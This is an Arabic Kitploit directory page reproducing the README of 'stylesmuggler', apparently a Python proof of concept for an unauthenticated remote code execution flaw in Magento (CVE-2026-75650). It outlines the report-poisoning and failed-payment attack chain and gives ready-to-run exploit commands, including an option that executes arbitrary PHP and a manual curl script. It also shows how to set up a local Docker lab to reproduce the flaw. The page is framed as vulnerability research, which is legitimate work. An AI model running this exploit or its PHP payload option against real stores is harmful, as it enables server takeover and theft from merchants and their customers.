Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/fortbridge/stylesmuggler
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقأداة الوصول عن بعد
GitHubfortbridge/stylesmuggler

stylesmuggler

Python PoC يعيد إنتاج CVE-2026-75650 StyleSmuggler، وهو RCE غير مصادق عليه في Magento عبر تسميم التقارير وعرض الدفعات الفاشلة، مع التحقق عبر canary.

عرض المستودع
منذ 9س 29دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

StyleSmuggler HTTP PoC

مستودع بحثي خاص لإعادة إنتاج StyleSmuggler عبر HTTP فقط، CVE-2026-75650، ضد مختبر Magento Open Source محلي.

اقرأ الشرح التقني الكامل في Magento StyleSmuggler RCE: Report Poisoning to Code Execution.

يقوم PoC المكتوب بلغة Python بتنفيذ التسلسل الكامل غير المُصادَق عليه:

  1. تسميم تقرير خطأ Magento وقراءة معرّف التقرير الخاص به من الاستجابة؛
  2. إنشاء سلة ضيف؛
  3. تعيين بريد الضيف الإلكتروني المطلوب لإشعار الدفع الفاشل؛
  4. تخزين بناء محلّل عنوان الفوترة المتداخل؛
  5. تشغيل عرض الدفع الفاشل باستخدام type وtext وstyles في سلسلة الاستعلام؛
  6. جلب canary جديد لكل تشغيل عبر HTTP.

لا ينسخ أي أداة مساعدة إلى الحاوية ولا يستدعي الماسح الضوئي عبر Docker. تكفي مكتبة Python القياسية.

التشغيل ضد مختبر موجود

root@kitploit:~
python3 exploit.py --target http://localhost:18082

يجب أن يحتوي المخرجات النهائية على RCE VERIFIED ونفس العلامة STYLESMUGGLER_RUN_... الجديدة المطبوعة سابقًا في ذلك التشغيل. لا يمكن لـ canary موجود مسبقًا تلبية الفحص لأن كل تشغيل يولّد علامة جديدة.

يجب أن يكون مسار التقرير هو المسار الذي تراه عملية PHP الهدف. تجاوزه عندما يستخدم Magento جذر مستندات آخر:

root@kitploit:~
python3 exploit.py \
  --target http://localhost:18082 \
  --report-dir /srv/magento/var/report

PHP مخصص

مرّر عبارات PHP بدون <?php أو ?>:

root@kitploit:~
python3 exploit.py \
  --target http://localhost:18082 \
  --code 'file_put_contents(getcwd()."/custom-test.txt", "PHP ".PHP_VERSION.PHP_EOL);'

curl -sS http://localhost:18082/custom-test.txt

يكتب PoC علامة التحقق الجديدة الخاصة به قبل تنفيذ المقتطف المُقدَّم ولا يزال يتحقق من تلك العلامة بعد ذلك.

Burp

يمكن إرسال كل طلب، بما في ذلك تسميم التقرير وجلب canary النهائي، عبر وكيل HTTP:

root@kitploit:~
python3 exploit.py \
  --target http://localhost:18082 \
  --proxy http://127.0.0.1:8082

أضف --proxy-insecure لهدف HTTPS لا تثق Python بشهادته المعترضة.

تدفق curl اليدوي

ينفّذ curl_failed_payment.sh طلبات المرحلة الثانية الأربعة ويسمّي مكوّن Magento الذي يصل إليه كل طلب. يتطلب curl وjq و openssl:

root@kitploit:~
./curl_failed_payment.sh /var/www/html/var/report/REPORT_ID

عيّن هدفًا آخر أو مستمع Burp عبر متغيرات البيئة:

root@kitploit:~
MAGENTO_URL=http://localhost:18082 \
BURP_PROXY=http://127.0.0.1:8082 \
./curl_failed_payment.sh /var/www/html/var/report/REPORT_ID

الهدف المحلي

يوفّر docker-compose.yml خدمات MySQL وOpenSearch وPHP/Apache معزولة على 127.0.0.1:18082. يتوقع شجرة مصدر Magento مثبّتة في ./magento2-src.

استخدم التحقق النهائي النظيف التزام Magento:

root@kitploit:~
f8405be831efa461ec18cc5a637cd98afa767015

استنسخ المصدر وثبّت تبعيات Composer الخاصة به قبل تشغيل عملية setup:install العادية لـ Magento:

root@kitploit:~
git clone --filter=blob:none --branch 2.4-develop \
  https://github.com/magento/magento2.git magento2-src
git -C magento2-src checkout f8405be831efa461ec18cc5a637cd98afa767015

docker compose build web
docker compose up -d db opensearch
docker compose run --rm web composer install --no-interaction

بعد تثبيت Magento مع مضيف قاعدة البيانات db، ومضيف OpenSearch opensearch، وعنوان URL الأساسي http://localhost:18082/، ابدأ خدمة الويب:

root@kitploit:~
docker compose up -d web
docker compose ps
تنزيل الأداة